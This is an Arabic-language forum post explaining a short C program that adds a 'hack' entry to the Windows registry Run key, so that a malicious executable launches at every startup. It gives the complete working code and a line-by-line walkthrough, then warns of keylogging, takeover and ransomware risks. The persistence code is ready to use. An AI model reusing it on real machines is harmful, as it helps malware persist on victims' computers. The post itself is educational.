- بواسطة x32x01 ||
البرنامج اللي انت شايفه ده هو برنامج خبيث (Malware) مكتوب بلغة C. اللي بيعمله ببساطة إنه بيضيف نفسه لقائمة البرامج اللي بتشتغل أوتوماتيكي مع بدء تشغيل نظام الويندوز. يعني أول ما تفتح الكمبيوتر، البرنامج ده هيشتغل من غير ما تحس
خلينا نشرح الكود خطوة بخطوة:
1. تعريف المسار بتاع البرنامج الخبيث:
ده المسار بتاع الملف التنفيذي الخبيث اللي الهكر عايز يشغله.
2. فتح الريجيستري:
هنا البرنامج بيحاول يفتح مفتاح الريجيستري اللي مسؤول عن البرامج اللي بتشتغل مع بدء التشغيل. الريجيستري ده زي قاعدة بيانات بيستخدمها الويندوز عشان يخزن إعدادات النظام.
3. لو المفتاح اتفتح بنجاح:
لو المفتاح اتفتح بنجاح، البرنامج هيضيف قيمة جديدة اسمها "hack" والمسار بتاعها هو المسار بتاع البرنامج الخبيث. كده أي مرة تفتح فيها الويندوز، البرنامج ده هيشتغل تلقائي.
مدى خطورته و ضرره:
1. التشغيل التلقائي:
البرنامج الخبيث ده هيشتغل كل مرة تفتح فيها الكمبيوتر، وده ممكن يدي الهكر القدرة على مراقبة نشاطك أو حتى سرقة بياناتك.
2. سرقة المعلومات:
ممكن البرنامج يسجل كل اللي بتكتبه على الكيبورد (keylogger) ويبعته للهكر، وده ممكن يؤدي لسرقة كلمات السر والمعلومات الحساسة.
3. السيطرة على النظام:
الهكر ممكن يستخدم البرنامج ده عشان يتحكم في الكمبيوتر بتاعك بالكامل، وده ممكن يؤدي لتثبيت برامج ضارة تانية أو حتى تشفير ملفاتك وطلب فدية عشان تفك التشفير (ransomware).
4. إبطاء النظام:
البرامج الخبيثة زي دي ممكن تبطء النظام وتخليه مش شغال بكفاءة، ده غير إنك ممكن تلاحظ إن فيه حاجات غريبة بتحصل زي فتح نوافذ بدون سبب أو بطء في الأداء.
باختصار، البرنامج ده ممكن يكون ليه تأثير كبير على نظامك ويؤدي لمشاكل كبيرة تتراوح من سرقة بياناتك لحد السيطرة الكاملة على جهازك. عشان كده لازم دايماً نكون حذرين ونستخدم برامج مكافحة الفيروسات ونخلي بالنا من البرامج اللي بننزلها ونشغلها على الكمبيوتر.
C:
#include <windows.h>
#include <string.h>
int main(int argc, char* argv[]) {
HKEY hkey = NULL;
// malicious app
const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe";
// startup
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey);
if (res == ERROR_SUCCESS) {
// create new registry key
RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
RegCloseKey(hkey);
}
return 0;
}خلينا نشرح الكود خطوة بخطوة:
1. تعريف المسار بتاع البرنامج الخبيث:
C:
const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe";2. فتح الريجيستري:
C:
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey);3. لو المفتاح اتفتح بنجاح:
C:
if (res == ERROR_SUCCESS) {
// create new registry key
RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
RegCloseKey(hkey);
}مدى خطورته و ضرره:
1. التشغيل التلقائي:
البرنامج الخبيث ده هيشتغل كل مرة تفتح فيها الكمبيوتر، وده ممكن يدي الهكر القدرة على مراقبة نشاطك أو حتى سرقة بياناتك.
2. سرقة المعلومات:
ممكن البرنامج يسجل كل اللي بتكتبه على الكيبورد (keylogger) ويبعته للهكر، وده ممكن يؤدي لسرقة كلمات السر والمعلومات الحساسة.
3. السيطرة على النظام:
الهكر ممكن يستخدم البرنامج ده عشان يتحكم في الكمبيوتر بتاعك بالكامل، وده ممكن يؤدي لتثبيت برامج ضارة تانية أو حتى تشفير ملفاتك وطلب فدية عشان تفك التشفير (ransomware).
4. إبطاء النظام:
البرامج الخبيثة زي دي ممكن تبطء النظام وتخليه مش شغال بكفاءة، ده غير إنك ممكن تلاحظ إن فيه حاجات غريبة بتحصل زي فتح نوافذ بدون سبب أو بطء في الأداء.
باختصار، البرنامج ده ممكن يكون ليه تأثير كبير على نظامك ويؤدي لمشاكل كبيرة تتراوح من سرقة بياناتك لحد السيطرة الكاملة على جهازك. عشان كده لازم دايماً نكون حذرين ونستخدم برامج مكافحة الفيروسات ونخلي بالنا من البرامج اللي بننزلها ونشغلها على الكمبيوتر.